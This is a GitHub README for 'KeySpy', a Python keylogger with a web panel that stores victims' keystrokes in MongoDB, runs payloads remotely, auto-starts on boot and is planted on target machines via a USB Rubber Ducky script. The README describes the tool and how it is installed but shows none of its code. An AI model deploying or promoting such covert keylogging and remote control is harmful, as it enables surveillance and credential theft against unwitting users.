Skip to content

Advance Python Keylogger & Remote Payload Executor for windows

License

Notifications You must be signed in to change notification settings

3rr0r-505/KeySpy

Repository files navigation

       

KeySpy - Remote Keylogger Tool

KeySpy is a Python keylogger with a web interface for viewing captured keystrokes and executing payloads remotely in real-time.

Features

  • Captures keystrokes in the background while running.
  • Stores captured keystrokes in mongoDB Atlas.
  • Displays captured keystrokes in a web interface.
  • Excute Payloads remotely from the web interface.
  • Auto-Start on System boot.
  • Capture IPv4 address of the target device.
  • Allows viewing keystrokes from multiple sessions.

D3V-Installation

  1. Clone the repository:
    git clone https://github.com/3rr0r-505/KeySpy.git
    
  2. Navigate to the project directory:
    cd KeySpy
    
  3. Install the required dependencies using pip:
    pip install -r requirements.txt
    

Usage

🦆Rubber Ducky

  • Download the DuckyScript.txt and load that in USB Rubber Ducky.
  • Connect the USB Rubber Ducky to the target machine.
  • It will run KeySpy on that machine.

🌐Web Interface:

Note

  • For Downloading the kSpy-AIO.exe file click here or visit the releases page.

⚠️ It's a Experimental project inspired by Hak5 OMG & still in development.

Contributing

Contributions are welcome! Feel free to open issues or pull requests for any improvements or bug fixes.

Legal Disclaimer

The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.

Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources. In this context the term "compromise" is henceforth understood as the leverage of exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.

License

This project is licensed under the MIT License 2.0 - see the LICENSE file for details.